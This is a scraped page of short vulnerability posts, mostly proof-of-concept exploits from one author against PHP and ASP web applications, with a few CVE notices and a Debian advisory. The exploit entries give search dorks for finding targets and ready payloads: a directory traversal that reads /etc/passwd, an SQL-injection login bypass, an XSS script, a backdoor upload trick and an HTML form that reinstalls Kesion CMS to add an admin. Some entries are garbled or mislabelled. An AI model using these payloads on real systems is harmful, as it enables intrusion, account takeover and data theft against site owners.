MVC Shop version 0.5 suffers from a directory traversal vulnerability.

====================================================================================================================================| # Title     : mvc-shop v0.5 Directory Traversal Vulnerability Vulnerability                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               | | # Vendor    : https://github.com/tanhongit/new-mvc-shop/releases/tag/v0.5                                                        || # Dork      :                                                                                                                    |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  infested file : index.php & admin.php<?phpsession_start();require_once('lib/model.php');require_once('lib/functions.php');require_once('content/models/cart.php');require "lib/statistics.php";require "lib/counter.php";// $count_file = 'logs/counter.txt';// $ip_file = 'logs/ip.txt';// function counting_ip()// {//     $ip = $_SERVER['REMOTE_ADDR'];//     global $count_file, $ip_file;//     if (!in_array($ip, file($ip_file, FILE_IGNORE_NEW_LINES))) {//         $current_val = (file_exists($count_file)) ? file_get_contents($count_file) : 0;//         file_put_contents($ip_file, $ip . "\n", FILE_APPEND);//         file_put_contents($count_file, ++$current_val);//     }// }// counting_ip();if (isset($_GET['controller'])) $controller = $_GET['controller'];else $controller = 'home';if (isset($_GET['action'])) $action = $_GET['action'];else $action = 'index';$file = 'content/controllers/' . $controller . '/' . $action . '.php';if (file_exists($file)) {    require($file);} else {    show_404();}[+]  use payload : ../../../../../../../../../etc/passwd[+]  https://127.0.0.1/chikoiquan.tanhongitcom/index.php?action=../../../../../../../../../etc/passwd[+]  https://127.0.0.1/https://chikoiquan.tanhongitcom/admin.php?file=../../../../../../../../../etc/passwd== Greetings to :===========================================================================jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* |        ============================================================================================

MVC Shop 0.5 Directory Traversal

PHP Live version 3.1 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : PHP Live 3.1 XSS Vulnerability                                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0.3(32-bit)                                             | | # Vendor    : https://www.phplivesupport.com                                                                                     |  | # Dork      : "powered by PHP Live! "                                                                                            |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /message_box.php?action=submit&deptid=1 AND 3*2*1%3d6 AND 556%3d556&email=sample%40email.tst&l=e-assis&message=20&name=xtmxbmyr&requestid=&send=Enviar Email&subject=1&x=1[+] Test : http://127.0.0.1/cestaseflorescriscombr/chat/message_box.php?action=submit&deptid=1%20AND%203*2*1%3d6%20AND%20556%3d556&email=sample%40email.tst&l=e-assis&message=20&name=xtmxbmyr&requestid=&send=Enviar%20Email&subject=1&x=1 .Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |                                                                                                                                              |=======================================================================================================================================

PHP Live 3.1 Cross Site Scripting

Acelle Email Marketing version 4.0.25 suffers from an arbitrary file upload vulnerability.

====================================================================================================================================  
| # Title     : Acelle Email Marketing 4.0.25 LTS unrestricted file uploads Vulnerability                                          |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 61.0.1 (32-bit)                                            |  
| # Vendor    : https://acellemail.com/                                                                                            |    
| # Dork      : "Acelle Email Marketing Application by acellemail.com"                                                            |  
====================================================================================================================================

poc :

[+]  Unrestricted file uploads You can upload malicious files in compressed format

[+]  Dorking İn Google Or Other Search Enggine .

[+]  go to templates : https://127.0.0.1/demoacellemailcom/admin/templates or https://127.0.0.1/demoacellemailcom/templates

[+]  Zip your backdoor And upload it.

[+]  chose web site and singup .

[+]  The method is easy and simple : You can use the HTML file to find out the upload path .

[+]  attach the file to be used with the first file and compress the two files with the ZIP extension .

[+]  So that in the HTML file we write the following code :

<!doctype html>  
<html lang="zxx">

<head>  
    
  <meta charset="utf-8">  
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">  
  <title>indoushka : PacketStorm Security</title>  
    
  <link rel="stylesheet" href="backdoor.php">

  </body>

</html>

[+] <link rel="stylesheet" href="backdoor.php"> <========| Here we write the name of the second attached file .

[+] When we upload the file and review it, we open the source code for viewing, and through the source code we know the path to upload the files and we open them

        Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh     |  
=======================================================================================================================================

Acelle Email Marketing 4.0.25 Arbitrary File Upload

Kesion CMS X version 2.0 suffers from an unauthenticated add administrator vulnerability.

====================================================================================================================================  
| # Title     : KesionCMS X2.0 Reinstall Add Admin Vulnerability                                                                   |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 105.0.(32-bit)                                             |   
| # Vendor    : https://www.kesion.com/                                                                                            |    
| # Dork      : Powered by KesionCMS                                                                                               |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] Use payload : /install/index.asp

[+] http://127.0.0.1.com/install/?action=s4 = add your information to login

[+] copy & past this exploit listed below into a text file and save it with ".html" extension

[+] Exploit :

[+] @t Line 09 & 16 change the domain name of target

    <head><title>  
            Hacked By indoushka  
        </title><link href="http://www.tzxdcpv.com/install/images/guide.css" rel="stylesheet" />  
        <script src="http://www.tzxdcpv.com/ks_inc/jquery.js" type="text/javascript"></script>  
    <script src="http://www.tzxdcpv.com/ks_inc/common.js" type="text/javascript"></script>  
    <script src="http://www.tzxdcpv.com/ks_inc/lhgdialog.js"></script>  
        </head>  
        <body>    
 <form name="form" method="post" action="http://127.0.0.1/install/index.asp" id="form">  
        <div class="guide">  
         <div class="guidetitle">  
                </div>  
                <div class="clear"></div>  
              </div>  
          <div class="clear"></div>  
 <input type="hidden" name="action" value="http://www.tzxdcpv.com/install/?action=s5"  />  
       <input type="hidden" name="DBlx" value=""  />  
       <input type="hidden" name="CkbData" value=""  />

              <input type="hidden" name="TxtDBName_a" value=""  />  
       <input name="TxtDBService" value="" id="TxtDBService" class="text" type="hidden"  />  
       <input name="TxtDBName" value="" id="TxtDBName" class="text" type="hidden" />  
       <input name="TxtDBUser" value="" id="TxtDBUser" class="text" type="hidden" />  
       <input name="TxtDBPass" value="" id="TxtDBPass" class="text" type="hidden"  />

      <div id="http://www.tzxdcpv.com/install/?action=s4">

           </div>  
     <div class="clear"></div>  
     <div class="sjlist">  
      <h5>网站参数配置</h5>  
      <ul>  
        <li><span>网站名称：</span><input name="TxtSiteName" value="科兴网络开发" id="TxtSiteName" class="text" type="text"><font color="red">*</font> 如：Kesion官方站</li>  
        <li><span>网站域名：</span><input name="TxtSiteUrl" value="http://cxsecurity.com" id="TxtSiteUrl" class="text" type="text"><font color="red">*</font> 后面不要带“/”。   
        如http://www.kesion.com。  
        </li>  
        <li><span>安装目录：</span><input name="TxtInstallDir" value="/" id="TxtInstallDir" class="text" type="text"><font color="red">*</font> 后面不要带“/”。   
        系统会自动获取，建议不要修改。  
        </li>  
        <li><span>授 权 码：</span><input name="TxtSiteKey" value="0" id="TxtSiteKey" class="text" type="text">  
        免费版本用户请留空或填“0”。  
        </li>  
        <li><span>后台目录：</span><input name="TxtManageDir" value="Admin/" id="TxtManageDir" class="text" type="text"><font color="red">*</font> 如：Manage,Admin，后面必须带"/"符号。</li>  
                <li><span> 后台登录验证码：</span>  
                 <input type="radio" name="isCode_a" value="True"  /> 启用    
                 <input type="radio" value="False"  name="isCode_a" checked="checked"/> 不启用  
                </li>

                       <li><span>管理认证码：</span>  
                 <input type="radio" name="isCode" value="True" onclick="$('#rzm').show()"/> 启用  <input onclick="$('#rzm').hide()" type="radio" value="False"  name="isCode" checked="checked"   /> 不启用   
                <font id="rzm" style="display:none">认证码：<input name="TxtManageCode" value="8888"  id="TxtManageCode" class="text" style="width:100px;" type="text"></font></li>  
      </ul>  
      <div class="clear"></div>  
      <h5>填写管理员信息</h5>  
      <ul>  
        <li><span>管理员账号：</span><input name="TxtUserName" value="admin"  id="TxtUserName" class="text" type="text"><font color="red">*</font> </li>  
        <li><span>管理员密码：</span><input name="TxtUserPass" value="admin888" id="TxtUserPass" class="text" type="text"><font color="red">*</font> 管理员密码不能为空</li>  
        <li><span>重复密码：</span><input name="TxtReUserPass" value="admin888" id="TxtReUserPass" class="text" type="text"></li>  
      </ul>  
      <div class="clear blank10"></div>

            <div style="padding:5px">  
      <input name="Button1" value="下一步" onClick="return(doCheck());" id="Button1" class="btnbg" type="submit">  
      </div>  
    </div>

Greetings to :=========================================================================================================================  
                                                                                                                                      |  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |          
                                                                                                                                      |  
=======================================================================================================================================

Kesion CMS X 2.0 Add Administrator

MongoDB Ops Manager Diagnostics Archive may not redact sensitive PEM key file password app settings. Archives do not include the PEM files themselves. This issue affects MongoDB Ops Manager v5.0 prior to 5.0.21 and MongoDB Ops Manager v6.0 prior to 6.0.12

CVE-2023-0342: Ops Manager Server Changelog — MongoDB Ops Manager 6.0

The Metform Elementor Contact Form Builder for WordPress is vulnerable to Cross-Site Scripting by using the 'mf_first_name' shortcode to echo unescaped form submissions in versions up to, and including, 3.3.0. This allows authenticated attackers, with contributor-level permissions or above, to inject arbitrary web scripts in pages that will execute when the victim visits a a page containing the shortcode when the submission id is present in the query string. Note that getting the JavaScript to execute requires user interaction as the victim must visit a crafted link with the form entry id, but the script itself is stored in the site database.

CVE-2023-0708: Changeset 2907471 – WordPress Plugin Repository

Debian Linux Security Advisory 5421-1 - Multiple security issues have been found in the Mozilla Firefox web browser, which could potentially result in the execution of arbitrary code.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5421-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffJune 07, 2023                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : firefox-esrCVE ID         : CVE-2023-34414 CVE-2023-34416Multiple security issues have been found in the Mozilla Firefox webbrowser, which could potentially result in the execution of arbitrarycode.For the stable distribution (bullseye), these problems have been fixed inversion 102.12.0esr-1~deb11u1.We recommend that you upgrade your firefox-esr packages.For the detailed security status of firefox-esr please refer toits security tracker page at:https://security-tracker.debian.org/tracker/firefox-esrFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmSA8KsACgkQEMKTtsN8TjYSqBAAqZeT5wOx739rLds++dr7nw2AsHTokRdcQskPewJwqSOYY8ErKQbY5Crfre/0OXsuaq/gy0Y2+7LeAManTLl4uOzVz2wBEjWFYQ4ptLG543PzPWpbwFTlcx3HVdmtAMUrg65/eEk+m/wMFCfU3ydL3SSuT1EMjRMXGm39y2ocT3JK+CAME0ajxyHkFIbz+UjvUXnpbXTeA++O0Caexic5ACAi3GPtmFSJI1vtwI9nCCNQnQMbIWdaQ8ANOm1U1FT5Wli71M2YE8LVGIaGsavKR62DRa0Hr6omHGbmsXNRCclM6lrx7vaAt274IOghNCXYQzSd58nHw6TlshcKn7ScMpNmwYhmsSYbquk57pSNLxVU2cJEQo8V6QqoskbhnkiY0rSBKWWBzB5HiUABgYD3HHGedDJF3jhNQQNV8O0FhZq2NCCC3BDw/VdeRz2fF2LeQwc4XMP6rmJSNkc2PFETT0cKRVS4EpLJMth6lk8HVQfTeBZe0hqI8W7fwQ/T4LJa55KOFEct6p5eNG7aq5he3zOWH0BA2WwuvDA/y8M7hIUxifP92RhsevIMQDrwaMGwRb6ejme1ChHUrax+hGtBqR1ti6fNoT1jRqmJs+15JKMLQwArrWivLVNhnfMh3Tb9UEE/VdV6dKmenuCFBx5wJIMRT83wSuCIcYVtaznfZ88==wKyc-----END PGP SIGNATURE-----

Debian Security Advisory 5421-1

MVC Shop version 0.5 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : mvc-shop v0.5 XSS Vulnerability                                                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               | | # Vendor    : https://github.com/tanhongit/new-mvc-shop/releases/tag/v0.5                                                        || # Dork      :                                                                                                                    |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  Register a new membership and enter the membership control panel and choose to modify the member's profile and in the name field put any payload that suits you and then save the changes[+]  Use Payload : <script>alert(/indoushka/);</script>[+]  http://127.0.0.1/chikoiquan.tanhongitcom/        == Greetings to :===========================================================================jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* |        ============================================================================================

MVC Shop 0.5 Cross Site Scripting

NETXPERTS CMS version 0.1 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : NETXPERTS-CMS v0.1 Auth By Pass Vulnerability                                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : http://netxperts.in/                                                                                               |  | # Dork      : "Designed by NETXPERTS"                                                                                            |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : user : 1'or'1'='1 & Pass : 1'or'1'='1[+] https://127.0.0.1/sivasudartravels/admin/production.phpGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |                                                                                                                                              |=======================================================================================================================================

NETXPERTS CMS 0.1 SQL Injection

Anuranan SBAdmin version 2 appears to leave default credentials installed after installation.

    ====================================================================================================================================| # Title     : Anuranan SBAdmin 2 Insecure Settings Vulnerability                                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 113.0.1 (64 bits)                                          | | # Vendor    : https://anuranangroup.com/                                                                                         |  | # Dork      : Created by: Anuranan Group                                                                                         |====================================================================================================================================poc :[+] The vulnerability is about leaving the default settings    During the installation of the script and using the default username and password[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : user&pass= admin [+] https://127.0.0.1/hpgreenlandresort.com/admin/login.aspxGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

Tag

#firefox